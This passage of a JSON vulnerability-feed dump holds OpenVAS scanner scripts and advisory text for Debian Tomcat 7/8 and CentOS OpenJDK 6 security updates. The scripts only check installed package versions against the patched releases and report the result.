{\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.72-3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:56", "description": "Multiple security vulnerabilities were\ndiscovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific\nmaintainer scripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.", "cvss3": {}, "published": "2016-12-18T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3739-1 (tomcat8 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9774", "CVE-2016-6816", "CVE-2016-9775", "CVE-2016-8735"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703739", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703739", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3739.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3739-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703739\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\", \"CVE-2016-9774\", \"CVE-2016-9775\");\n script_name(\"Debian Security Advisory DSA 3739-1 (tomcat8 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-18 00:00:00 +0100 (Sun, 18 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3739.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"tomcat8 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 8.0.14-1+deb8u5.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems have\nbeen fixed in version 8.5.8-2.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n script_tag(name:\"summary\", value:\"Multiple security vulnerabilities were\ndiscovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific\nmaintainer scripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.8-2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:54:27", "description": "Multiple security vulnerabilities were\ndiscovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific\nmaintainer scripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.", "cvss3": {}, "published": "2016-12-18T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3738-1 (tomcat7 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9774", "CVE-2016-6816", "CVE-2016-9775", "CVE-2016-8735"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703738", "href": "http://plugins.openvas.org/nasl.php?oid=703738", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3738.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3738-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703738);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\", \"CVE-2016-9774\", \"CVE-2016-9775\");\n script_name(\"Debian Security Advisory DSA 3738-1 (tomcat7 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-18 00:00:00 +0100 (Sun, 18 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3738.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tomcat7 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java\nServlet and the JavaServer Pages (JSP) specifications from Sun Microsystems, and\nprovides a 'pure Java' HTTP web server environment for Java code to run.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 7.0.56-3+deb8u6.\n\nFor the testing (stretch) and unstable (sid) distributions, these\nproblems have been fixed in version 7.0.72-3.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n script_tag(name: \"summary\", value: \"Multiple security vulnerabilities were\ndiscovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific\nmaintainer scripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u6\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.72-3\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.72-3\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:02", "description": "Multiple security vulnerabilities were\ndiscovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific\nmaintainer scripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.", "cvss3": {}, "published": "2016-12-18T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3739-1 (tomcat8 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9774", "CVE-2016-6816", "CVE-2016-9775", "CVE-2016-8735"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703739", "href": "http://plugins.openvas.org/nasl.php?oid=703739", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3739.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3739-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703739);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\", \"CVE-2016-9774\", \"CVE-2016-9775\");\n script_name(\"Debian Security Advisory DSA 3739-1 (tomcat8 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-18 00:00:00 +0100 (Sun, 18 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3739.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tomcat8 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java\nServlet and the JavaServer Pages (JSP) specifications from Oracle, and provides\na 'pure Java' HTTP web server environment for Java code to run.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 8.0.14-1+deb8u5.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems have\nbeen fixed in version 8.5.8-2.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n script_tag(name: \"summary\", value: \"Multiple security vulnerabilities were\ndiscovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific\nmaintainer scripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u5\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.8-2\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:38", "description": "Check the version of java", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2016:0723 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882485", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882485", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2016:0723 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882485\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:46 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for java CESA-2016:0723 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of java\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.6.0-openjdk packages provide the\nOpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0723\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021862.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.39~1.13.11.0.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.39~1.13.11.0.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.39~1.13.11.0.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.39~1.13.11.0.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.39~1.13.11.0.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:10", "description": "Check the version of java", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2016:0723 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882487", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882487", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2016:0723 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882487\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:59 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for java CESA-2016:0723 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of java\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.6.0-openjdk packages provide\nthe OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software\nDevelopment Kit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\");\n script_tag(name:\"affected\", value:\"java on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0723\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021863.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 